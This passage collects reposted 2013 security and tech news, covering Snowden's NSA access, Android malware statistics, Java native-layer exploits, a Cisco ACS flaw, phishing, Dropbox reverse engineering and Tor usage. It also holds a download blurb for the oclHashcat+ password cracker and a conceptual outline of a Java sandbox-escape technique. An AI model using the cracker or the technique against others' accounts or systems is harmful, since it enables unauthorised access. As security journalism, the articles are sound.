potentially harmful links and stop them from spreading," a company spokesman said. "Those systems quickly spotted these links, and we are working to clear them from the site now. ® Source TheRegister.Co.Uk

The US National Security Agency may have some of the most sophisticated cyber-surveillance programs in the world, but it was trivial for former NSA contractor Edward Snowden to walk off with sensitive data, sources say, owing to the agency's antiquated internal security. "The [Defense Department] and especially NSA are known for awesome cyber security, but this seems somewhat misplaced," former US security official Jason Healey told NBC News on Thursday. "They are great at some sophisticated tasks but oddly bad at many of the simplest." While some sources claimed that it was Snowden's genius for infiltrating electronic systems that allowed him to make off with a cache of at least 20,000 documents – "Every day, they are learning how brilliant [snowden] was," one former US official said – other sources suggested that all he needed was a little determination and the right business card. "It's 2013," an insider told NBC, "and the NSA is stuck in 2003 technology." For example, the NSA policy prevents a typical worker from doing things like copying files to USB thumb drives or other external storage. But Snowden had an easy way around those restrictions, simply by virtue of being classified as a "systems administrator". With that privilege, Snowden would have been able to move files around at will, sources claim. If higher-ups ever questioned him about it, he could have claimed he was doing so in order to repair a corrupted drive or some other maintenance operation. Snowden's administrator account also gave him the ability to log into the accounts of other users of the agency's NSAnet computer systems – some of whom had higher security clearance than Snowden himself did. In essence, Snowden was able to impersonate those NSA employees to gain access to highly sensitive documents, which he was then able to copy to thumb drives. This was so easy to do that one source described him as a "ghost user" of NSAnet, whose activities couldn't easily be traced. The NSA is reportedly only now piecing together the exact steps Snowden took to infiltrate its systems, including identifying specific users whose accounts he used to access documents. But there's no clear paper trail – investigators are said to be looking for red-flag discrepancies, such as accounts that were accessed while their owners were on vacation. Once he began collecting documents, Snowden was surely also emboldened by the fact that, as a contractor working for Booz Allen Hamilton in Hawaii, he never once needed to set foot in NSA headquarters. Instead, he could access the files he wanted from a computer terminal some 5,000 miles away. The NSA reportedly employs around 40,000 people, roughly 1,000 of which are systems administrators. Like Snowden, most of those systems admins are contractors – or they were, at least. Earlier this month, NSA director General Keith Alexander announced that the agency plans to reduce its total number of sysadmins by 90 per cent, specifically to reduce the number of staffers who have access to secret information. Such measures come too late to reduce the impact of Snowden's leaks, however. As one former intelligence official described the aftermath of Snowden's disclosures to NBC News, "The damage, on a scale of 1 to 10, is a 12." ® Source TheRegister.Co.Uk

Whether you consider the Internet of Things (all the way up to the Internet of Everything) to be the Way of The FutureTM or just This Year's Buzzword® something of an exaggeration, there's a good chance some of you will run into some of its real-world manifestations in the near future. After all, the building you work in is already wired up with sensors and right now, they're using proprietary protocols that make them hard to wire into applications. The industry's long-term vendor vision is that these critters will soon all be talking IP to make connection easier and more useful. Existing sensors will also be joined by many, many, millions more, so that anything worth measuring can be measured ... and then managed. To make that and other happen, the boffins in charge of creating a world of sensor-based stuff using IP to communicate have had to re-think connectivity pretty much from the bottom up. With the assistance of Cisco distinguished engineer Jeff Apcar, The Register has taken a dive under the skin of the IPv6 Routing Protocol for Low-Power and Lossy Networks (RPL, pronounced “ripple”), a key emerging IETF standard for routing Internet of Everything messages. Some parts of the hypothesised Internet of Things/Internet of Everything – for the rest of this article we'll stick to IoE – don't look that much different to any Internet client. Take a connected car, for example. Give it an IP interface of some kind, give it mobile connectivity, and hey presto! the car is connected to the Internet (with the attendant risks that may involve, but that's another story). The imagined future collections of sensors are different. Computing power is cheap, and so are are “real-world” interfaces like microphones, accelerometers, gyroscopes, thermometers and so on. Connectivity, it turns out, can be non-trivial thanks to various wireless standards. But routing messages from huge numbers of devices is very complex, which is why outfits like Cisco are working up new routing protocols to serve the sensor-based Internet. To understand the need for new routing techniques, consider a city-wide network of sound sensors. Such a network is posited as being able to identify the noise profile of a nearby car accident so an Ambulance can be despatched before the drivers have stopped arguing and called the police. Traffic management centres could also start to re-route cars seconds after the sounds of bumper striking bumper and glass hitting tarmac are registered. The model only works if you have a lot of sensors around, and that poses practical problems because it's not worth collecting that data if you have to replace sensors every few weeks. Sensor designs therefore imagine devices that are completely stand-alone, communicate wirelessly and can go years between battery replacements (or are "scavenger-class" devices that work on solar or wind power). Sensor designs of this sort mean you can simply affix them to a handy solid object and forget them; having to connect power to every single device would destroy any business case such a sensor network could support. Source TheRegister.Co.Uk

The US Department of Homeland Security (DHS) warned law enforcement, security and government workers against using outdated versions of Google Android, claiming that 79 percent of all mobile malware targets the platform. The DHS issued the warning in a Roll Call Release for US emergency services. The department said criminal interest in Android is due to a combination of its impressive market share, open architecture and fragmented ecosystem. High malware figures were cited as proof that agents using smart devices must ensure their phones and tablets always run the latest software available. "Android is the world's most widely used mobile operating system (OS) and continues to be a primary target for malware attacks due to its market share and open source architecture," read the report. "The growing use of mobile devices by federal, state and local authorities makes it more important than ever to keep mobile OS patched and up to date." Interestingly, despite being all but defunct, Nokia's ancient Symbian OS is the second most targeted, with the DHS finding that 19 percent of all mobile malware is designed for it. While high, the 19 percent figure is probably a false indicator of criminals' interest in Symbian today, and is likely to be composed of older malware rather than dangerous new threats. Prior to the arrival of Android, Symbian was the OS of choice for criminals due to its ties to Nokia, but since buyers became more interested in Android and iOS, criminal interest in Symbian has waned. Apple iOS and "other" operating systems were both listed as being the victims of 0.7 percent of all mobile malware. At the very bottom Windows Phone and BlackBerry were each listed as being the target of 0.3 percent of the world's mobile malware. The low number of threats targeting Apple iOS, despite the popularity of its iPhone and iPad devices, is largely due to the closed security model. This model forces developers to sell their wares on Apple's official App Store, which closely vets all applications before allowing them into the marketplace. Earlier this year F-Secure security expert Mikko Hypponen praised Apple for its robust security, listing the App Store as one of the security community's greatest achievements. The findings mirror those of numerous security vendors. Kaspersky Labs reported detecting 100,000 mobile malware variants targeting Android during the second quarter of 2013, in its IT Threat Evolution report. Source V3.CO.UK

Criminal groups are using Java native layer vulnerabilities to infiltrate businesses and government systems, according to security firm Trend Micro. Trend Micro threats analyst Jack Tang reported the shift in a blog post, confirming the new attacks on Oracle's Java platform are getting increasingly complex. He wrote: "Java exploits can be divided into two types: Java layer exploits and Java native layer exploits. In the past, Java layer vulnerabilities were more common, but that is no longer the case. Before 2013, there was a three-to-one ratio of Java layer vulnerabilities to Java native layer vulnerabilities. Starting this year, however, we are now seeing more native layer flaws." Tang said the move to target Java Native Layer exploits is troubling as they show an advance in sophistication within the cyber criminal community. "Java native layer exploits target the Java native layer runtime. These exploits are harder to create, as they need to bypass OS-level protections like ASLR [address space layout randomisation] and DEP [Data Execution Prevention]. In addition, the skills needed to create native layer exploits are more difficult to acquire," he wrote. "This year, however, attackers clearly have the capability to take advantage of native layer vulnerabilities. Two methods of exploitation are becoming more common, one is to make use of a Java array length overflow to tamper with the JavaBeans. Statement object's AccessControlContext member." Tang added that the exploits detected are doubly dangerous as they grant the attack a number of powers over successfully infected systems. "An attacker can then use the array object to get or set the following buffer precisely. They can tamper with the following JavaBeans. Statement object's acc field, which points to a AccessControlContext object. In general, the acc field will be tampered to point to a full permission AccessControlContext object. This will let arbitrary code be run on the affected system." Oracle's Java platform has been a growing target for cyber criminals. Over the last year the attacks have forced Oracle to release a number of out of cycle security updates. Director of enterprise security at Trusteer Dana Tamir said despite having fixes available many firms are yet to release the updates, meaning criminals can and are still creating attacks to target them. "Vulnerable versions of Java can still be found in many organisations. This is either because users haven't upgraded to the latest Java version available, or because some tools or applications bundle vulnerable versions of Java. This leaves an open window to attackers who exploit such vulnerabilities in order to compromise employee endpoints and gain a foothold in the network," sad Tamir. Tang mirrored Tamir's sentiment calling for businesses to update their systems as soon as possible. "We urge users to carefully evaluate their usage of Java is necessary and ensure that copies of Java that are used are updated, to reduce exposure to present and future Java flaws," he wrote. Java security issues have been a recurring theme throughout 2013 with numerous patches issued by the likes of Oracle and Apple. Source V3.CO.UK

In loc sa faci pe desteptul cu altii mai bine ai sta si i-ai explica omului. Anttzzk : O parola pe facebook nu se poate "sparge".Ea se poate afla prin diferite metode : Social Engineering , Keylogger , diversi virusi.

The vulnerability could allow remote, unauthenticated attackers to take control of the underlying operating system, the company said Cisco Systems released security patches for Secure Access Control Server (Secure ACS) for Windows to address a critical vulnerability that could allow unauthenticated attackers to remotely execute arbitrary commands and take control of the underlying operating system. Cisco Secure ACS is an application that allows companies to centrally manage access to network resources for various types of devices and users. According to Cisco's documentation, it enforces access control policies for VPN, wireless and other network users and it authenticates administrators, authorizes commands, and provides an audit trail. Cisco Secure ACS supports two network access control protocols: Remote Access Dial In User Service (RADIUS) and Terminal Access Controller Access-Control System Plus (TACACS+). The newly patched vulnerability is identified as CVE-2013-3466 and affects Cisco Secure ACS for Windows versions 4.0 through 4.2.1.15 when configured as a RADIUS server with Extensible Authentication Protocol-Flexible Authentication via Secure Tunneling (EAP-FAST) authentication. "The vulnerability is due to improper parsing of user identities used for EAP-FAST authentication," Cisco said Wednesday in a security advisory. "An attacker could exploit this vulnerability by sending crafted EAP-FAST packets to an affected device." "Successful exploitation of the vulnerability may allow an unauthenticated, remote attacker to execute arbitrary commands and take full control of the underlying operating system that hosts the Cisco Secure ACS application in the context of the System user for Cisco Secure ACS running on Microsoft Windows," the company said. The vulnerability received the maximum severity score, 10.0, in the Common Vulnerability Scoring System (CVSS), which indicates that it is highly critical. Cisco Secure ACS for Windows version 4.2.1.15.11 was released to address the flaw. There are no known workarounds, so upgrading to the patched version of the application is recommended. Source ComputerWorld.Com

A new phishing message loaded with a malicious Google Doc is targeting Gmail users, according to security firm Sophos. Senior security advisor at Sophos Chester Wisniewski reported the scam in a blog post, confirming that the message attempts to dupe users into clicking a suspect link by pretending to be a "Secure Document" from their bank. Wisniewski said the attack is basic in principle, but it is dangerous as the message has been cleverly socially engineered to look like it is authentic and uses an atypical infection method. "While those of us in the security industry might not be surprised, phishing attacks are consistently proving themselves to be one of the most effective ways to evade traditional defences. As many organisations move to the Google cloud, this type of phishing lure will continue to yield results for the criminals," he said. "Many organisations are using Google and other cloud service providers to provide critical IT services. At first glance this could be very believable." The attack reportedly links the victim to a phishing page hosted in Thailand, which attempts to dupe them into entering their password information for a variety of online services. "The page not only asks for your Google credentials, it also suggests it will accept Yahoo, Outlook.com, Hotmail, AOL, Comcast, Verizon, 163.com or any other email account. Of course filling out this form can only end in tears. Your details are sent off to the compromised servers for whatever purposes these thieves desire," he wrote. Wisniewski said the password theft is likely to be the first stage in a wider attempt to steal more information, such as the web user's banking login details. "You might think, so what, my Gmail isn't full of secrets that will destroy my nation/life/career. You would likely be wrong. Your email is the key to unlocking much of your online identity. Forget your banking password? No worries, they will email you a password reset link," he wrote. He added that the high success rate of phishing means attacks like this will continue until businesses work harder to educate their staff about cyber best practice. "As an IT administrator these are opportunities to educate your staff on the risks. This might not be the most convincing of the phishes that are out there, but it is a useful tool to educate your staff," he wrote. Phishing is a growing problem facing businesses. Kaspersky Lab reported that the number of phishing messages hitting UK web users has tripled over the last year, with crooks targeting an average of 3,000 Brits every day. The UK government has set up a number of resources to help businesses protect themselves against the influx of attacks. Most recently The GCHQ launched two cyber incident response and advice initiatives, designed to help businesses prepare for and mitigate the damage of cyber attacks. Source V3.CO.UK

Spam and malicious text messages pose a far bigger threat to consumers and businesses than email spam, according to security firm Cloudmark. The firm, which runs the global spam reporting service on behalf of the GSMA, revealed earlier this year that there are six million spam texts sent everyday in the UK. It has now warned that the problem is getting worse due to a number of converging factors driving crooks to mobile spam. The firm’s chief technology officer, Neil Cook, told V3 that the fact people are far more likely to open text messages than emails poses a major problem. “The open rate for an SMS is 80-90 percent within a minute, whereas email you may not look at all day,” he noted. "As a result it is far easier to get someone to open a message telling them to ring a number or visit a website than on email." He also said people are still not as wary about messages they receive on phones as they are via email. “The phone is a more trusted medium, which is why we see more fraud as opposed to bulk spam selling, because fraud is much more easily monetised by getting people to ring a premium number from the text, or visit a malicious website," he said. "There’s not so much screen real estate so it’s harder to tell what is a phishing message or something genuine." Cook also pointed out that the high-end capabilities of smartphones and new, IP-based 4G networks, are ideal for criminals to compromise, something that is posing fresh concerns for operators. “As more people move from fixed to mobile broadband and smartphones then problems from botnets and viruses are moving from PCs to smartphones so there is the potential for real issues here,” he said. “This could also have a big impact on operators as it will chug the network. For fixed line this doesn’t affect people so much, but with mobile over the air resources are very precious, so if network is being chewed up with spam sending messages, that’s a concern.” On top of this Cook cited the BYOD trend as a major risk to enterprises that fraudulent texts pose, noting that it only takes one handset to be infected to put an entire organisation at risk. “BYOD is a big issue. One of the new areas we're getting into is helping protect phones from going to malicious websites or calling malicious phone numbers, which is an increasing concern as that’s a route to infect your phone or steal company secrets,” he said. “You only have to have one person infected with a phone running an application key logger or sending company data.” The rising concerns over spam and malicious text messages come amid reviews by the government to tackle this menace, and a stronger stance by the Information Commissioner’s Office (ICO) to hurt the firms behind messages, with several notable fines levied by the watchdog. Source V3.Co.Uk

Enterprise-grade Linux vendor Suse is extending its partnership with VMware by making its Suse Linux Enterprise Server available on the newly launched vCloud Hybrid Service later this year. Suse has had a version of its Enterprise Server distribution optimised and bundled with VMware vSphere cloud computing platform since 2010, with the maintenance costs included in the customer's VMware vSphere support agreement. This agreement has now been extended so that Suse Linux Enterprise Server for VMware will be similarly available through the vCloud Hybrid Service from sometime in the fourth quarter, according to Suse. VMware's vCloud Hybrid Service was first announced by the firm back in March, but will only be made generally available to US customers from September, VMware announced at its VMworld conference in San Francisco this week. The firm declined to give a date for when the vCloud Hybrid Service might be available to customers outside the US. The initiative sees VMware offering public cloud infrastructure-as-a-service (IaaS) capabilities to VMware customers, based on the same platform as they are already using to build an internal private cloud. This enables them to extend out to use additional external resources if and when required, under the control of the same management and orchestration tools. With Suse's extended support, customers will have the option of running workloads on Suse Linux Enterprise Server in the VMware vCloud Hybrid Service, giving them greater flexibility for optimising their IT resources. Brian Green, managing director for Suse UK, said the firm is enjoying a growing joint customer base with VMware thanks to their partnership. "Today's announcement demonstrates that Suse and VMware are continuing to partner to offer our customers choice and improved value. Suse Linux is the only Linux distribution optimised for VMware and this announcement allows customers to leverage these benefits through the VMware vCloud Hybrid Service," he said. Suse Linux Enterprise Server for VMware's vCloud Hybrid Service will be available in the fourth quarter of this year, the firm said. Source V3.CO.UK

Description : oclHashcat+ is an advanced GPU hash cracking utility that includes the World's fastest md5crypt, phpass, mscash2 and WPA / WPA2 cracker. It also has the first and only GPGPU-based rule engine, focuses on highly iterated modern hashes, single dictionary-based attacks, and more. Author : Kartan Source : oclHashcat+ Advanced GPU Hash Cracking Utility 0.15 ? Packet Storm Download : Here

A couple of security researchers have set spines shivering in the cloud world by demonstrating that Dropbox's obfuscated code can be reverse-engineered, along the way capturing SSL data from the service's cloud and bypassing the two-factor authentication used to secure user data. However, as is clear from the Usenix research paper and has been confirmed by Dropbox, their work doesn't create a generic attack vector. The attacks only work if the attacker already has unfettered access to the target machine. As Dropbox puts it: “In the case outlined here, the user’s computer would first need to have been compromised in such a way that it would leave the entire computer, not just the user's Dropbox, open to attacks across the board.” (More on this in a minute.) Perhaps the most interesting aspect of the work by Openwall's Dhiro Kholia and CodePainters' Przemyslaw Wegrzyn is that they were able to reverse-engineer the heavily protected Dropbox Python code. “Our work reveals the internal API used by Dropbox client and makes it straightforward to write a portable open-source Dropbox client,” they write. As a result, they say, it should be possible for researchers to subject Dropbox to more rigorous security analysis. The researchers also observe that Dropbox's two-factor authentication, used for accessing its Website, is not supported in the client software. “This implies that it is suf?cient to have only the host_id value to gain access to the target’s data stored in Dropbox.” However, the host_id value is stored on the local machine in an encrypted SQLite database – meaning it can only be recovered by someone with access to that machine. ® Source TheRegister.CO.Uk

The privacy-enhancing Tor network has seen its total number of users per day more than double in the last month, reaching the highest levels since the project first began compiling usage statistics. Tor traffic was up all over the globe in August 2013 – and we do mean up (Source: Tor Project) The network, which anonymizes internet traffic by routing it through a series of encrypted relays, had been humming along with an average base of around 500,000 directly connected users for most of the year. But that started to change around mid-August, and the results were both sudden and dramatic. As of Wednesday, the Tor network was seeing more than 1,200,000 users connecting daily, a figure that topped the previous record of around 950,000 global daily users in January 2012. The reasons for the usage spike are not clear, but you can pretty much take your pick. The figures come on the heels of a seemingly never-ending series of revelations about security agencies in the US and UK and their roles in spying on internet traffic, both at home and abroad. In early August, Lavabit and Silent Circle both shut down their secure email services, citing government pressure and the difficulty involved in plugging all the leaks inherent in the internet email protocols. Then, as the month rolled on, the US National Security Agency's surveillance activities were revealed to have far surpassed the agency's mandate to keep an eye on foreign agitators. We learned that NSA agents secretly yet routinely shared intelligence with the Drug Enforcement Administration, spied on thousands of US citizens who had no relationship to ongoing terror investigations, and even allegedly bugged the United Nations. Across the pond, Blighty's Government Communications Headquarters stormed the offices of The Guardian newspaper and smashed some of its computer equipment in an apparent attempt to intimidate it into not reporting on the GCHQ's surveillance activities at home. Sure enough, Tor users in the US and the UK made up a large portion of the total in August. Around 90,000 Americans were connecting to Tor daily at the start of the month, but that figure grew to around 150,000 daily users by the end. UK daily users grew from around 16,000 to more than 35,000. But other countries saw similar increases, too. India's Tor usage skyrocketed from just 7,500 daily users to over 32,000. In Brazil, usage climbed from around 15,000 to more than 85,000 users. Even China's Tor usage was on the rise – though, given the PRC government's tight control over internet access, there remain fewer than 400 confirmed Chinese Tor users per day, on average. Mind you, there have been similar spikes in Tor usage before, and they have generally been short lived. It's entirely possible that this latest increase may have nothing to do with public concern over domestic spying, but stems from some other cause. For example, in early August the Tor Project admitted that the network had come under attack by a previously unknown malware exploit. A similar assault could potentially be possible for late August's sudden surge in Tor usage. The Reg will keep you posted if we learn anything new. But whatever the cause, as the Tor Project's Roger Dingledine observed on Tuesday, "It's not just a fluke in the metrics data – it appears that there really are twice as many Tor clients running as before." "Anybody know details?" Dingledine wrote. "It's easy to speculate ... but some good solid facts would sure be useful." Indeed. ® Source TheRegister.Co.Uk

While the world is still waiting for a full-blown quantum communications setup, quantum key distribution – QKD – is already a contested product market. Now, an international collaboration has shown that QKD can be brought to the smartphone. The project, carried out by the University of Bristol, Cambridge, Griffith University in Queensland and , Xi’an Jiaotong University in China, has published a paper on Arxiv outlining its work. The researchers have, essentially, split the QKD problem into a client-server architecture, allowing most of the “heavy lifting” to be carried out server-side so that a resource-constrained client like a smartphone. It wouldn't work on any of today's smartphones, since there's still one somewhat exotic component needed at the client end, an on-chip polarisation rotator. And the client device wouldn't be able to use QKD over the air, since it would need to tether to a fibre to receive the quanta from the far end. Whereas most QKD kit on the market today has quantum optics equipment at both ends, the scheme proposed in the Arxiv paper would do most of the quantum work at one end only. “Alice” creates the photons and sends them down the fibre to “Bob”, who only needs the capability to change the photons' polarisation and send them back. The protocol devised to make this work is called rfiQKD, “reference frame independent quantum key distribution”, and it works without needing to align Alice and Bob's equipment. As it's described at MIT's Arxiv Blog: “Instead Alice and Bob make measurements in random directions and then publish the list of directions for anyone to see. Only those measurements that happened to be aligned contribute to the code.” As the researchers note in their paper, “the results signi?cantly broaden the operating potential for QKD outside of the laboratory and pave the way for quantum enhanced security for the general public with handheld mobile devices.” And before readers poke fun at the idea of a smartphone containing quantum polarisers on-board, think of this: how many of us carried around accelerometers ten years ago? ® Source TheRegister.Co.Uk